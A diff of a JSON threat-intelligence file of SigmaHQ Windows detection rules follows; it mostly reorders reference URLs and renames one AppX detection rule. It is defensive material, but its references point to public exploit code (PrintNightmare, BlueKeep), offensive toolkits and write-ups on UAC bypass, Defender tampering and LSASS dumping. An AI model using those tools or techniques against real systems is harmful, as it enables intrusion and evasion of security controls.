"refs": [ "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", + "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", "https://winaero.com/enable-openssh-server-windows-10/", "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", - "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" ], "tags": [ @@ -10336,8 +10336,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/fuzzyf10w/status/1410202370835898371", - "https://github.com/afwu/PrintNightmare", "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" ], "tags": [ @@ -10405,8 +10405,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection", + "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" ], "tags": [ @@ -10430,8 +10430,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml" ], "tags": [ @@ -10556,8 +10556,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", "https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml" ], "tags": [ @@ -10670,8 +10670,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware", + "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml" ], "tags": [ @@ -10719,8 +10719,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml" @@ -10892,8 +10892,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://twitter.com/malmoeb/status/1535142803075960832", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" ], @@ -10963,8 +10963,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://ngrok.com/", + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml" ], "tags": [ @@ -10997,9 +10997,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", "https://twitter.com/gentilkiwi/status/861641945944391680", + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml" ], "tags": [ @@ -11516,9 +11516,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://www.sans.org/webcasts/119395", "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" ], "tags": [ @@ -11588,8 +11588,8 @@ "logsource.product": "windows", "refs": [ "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" ], "tags": [ @@ -11682,8 +11682,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/zerosum0x0/CVE-2019-0708", "https://github.com/Ekultek/BlueKeep", + "https://github.com/zerosum0x0/CVE-2019-0708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" ], "tags": [ @@ -11715,8 +11715,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.secura.com/blog/zero-logon", "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", + "https://www.secura.com/blog/zero-logon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" ], "tags": [ @@ -12102,8 +12102,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml" ], "tags": [ @@ -12161,8 +12161,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml" ], "tags": [ @@ -12278,8 +12278,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/wdormann/status/1347958161609809921", "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", + "https://twitter.com/wdormann/status/1347958161609809921", "https://twitter.com/jonasLyk/status/1347900440000811010", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml" ], @@ -12330,8 +12330,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" ], "tags": [ @@ -12366,8 +12366,8 @@ "logsource.product": "windows", "refs": [ "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" ], "tags": [ @@ -13101,8 +13101,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server_analytic/win_dns_analytic_apt_gallium.yml" ], "tags": [ @@ -13136,8 +13136,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/mattifestation/status/899646620148539397", "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://twitter.com/mattifestation/status/899646620148539397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" ], "tags": [ @@ -13171,9 +13171,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" ], "tags": [ @@ -13244,11 +13244,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", - "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c", - "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", + "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" ], "tags": [ @@ -13290,10 +13290,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", - "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_appx_package_installation.yml" ], "tags": [ @@ -13316,10 +13316,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", - "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_package_locations.yml" ], "tags": [ @@ -13330,7 +13330,7 @@ "value": "Suspicious AppX Package Locations" }, { - "description": "Detects installation of known malicious appx packages", + "description": "Detects potential installation or installation attempts of known malicious appx packages", "meta": { "author": "Nasreddine Bencherchali", "creation_date": "2023/01/11", @@ -13342,9 +13342,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", - "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_mal_appx_names.yml" ], "tags": [ @@ -13352,7 +13352,7 @@ ] }, "uuid": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", - "value": "Malicious AppX Package Installed" + "value": "Potential Malicious AppX Package Installation Attempts" }, { "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", @@ -13367,10 +13367,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", - "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_domains.yml" ], "tags": [ @@ -13393,10 +13393,10 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", - "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_uncommon_package_locations.yml" ], "tags": [ @@ -13647,8 +13647,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" ], "tags": [ @@ -13959,9 +13959,9 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" ], "tags": [ @@ -13996,8 +13996,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/recyclebin.html", "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", + "https://persistence-info.github.io/Data/recyclebin.html", "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" ], @@ -14057,8 +14057,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" ], "tags": [ @@ -14359,8 +14359,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", "https://github.com/eset/malware-ioc/tree/master/oceanlotus", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" ], "tags": [ @@ -14384,8 +14384,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" ], "tags": [ @@ -14589,8 +14589,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", + "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" ], "tags": [ @@ -14614,8 +14614,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" ], "tags": [ @@ -14764,10 +14764,10 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", - "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", - "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", + "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", + "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" ], "tags": [ @@ -14826,8 +14826,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" ], "tags": [ @@ -14940,8 +14940,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://wikileaks.org/vault7/#Pandemic", "https://twitter.com/MalwareJake/status/870349480356454401", + "https://wikileaks.org/vault7/#Pandemic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" ], "tags": [ @@ -15007,8 +15007,8 @@ "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "http://woshub.com/how-to-clear-rdp-connections-history/", "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", + "http://woshub.com/how-to-clear-rdp-connections-history/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" ], "tags": [ @@ -15066,8 +15066,8 @@ "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://seclists.org/fulldisclosure/2020/Mar/45", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" ], "tags": [ @@ -15115,11 +15115,11 @@ "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/shell/launch", "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/7", "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", + "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", + "https://docs.microsoft.com/en-us/windows/win32/shell/launch", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" ], "tags": [ @@ -15268,8 +15268,8 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml" ], "tags": [ @@ -15325,11 +15325,11 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", - "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" ], "tags": [ @@ -15353,8 +15353,8 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", "https://persistence-info.github.io/Data/amsi.html", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml" ], "tags": [ @@ -15575,8 +15575,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/htmlhelpauthor.html", "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", + "https://persistence-info.github.io/Data/htmlhelpauthor.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml" ], "tags": [ @@ -15599,8 +15599,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", "https://github.com/rootm0s/WinPwnage", + "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" ], "tags": [ @@ -15700,8 +15700,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" ], "tags": [ @@ -15749,8 +15749,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" ], "tags": [ @@ -15799,9 +15799,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" ], "tags": [ @@ -15825,13 +15825,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", - "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", - "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" ], "tags": [ @@ -15867,6 +15867,30 @@ 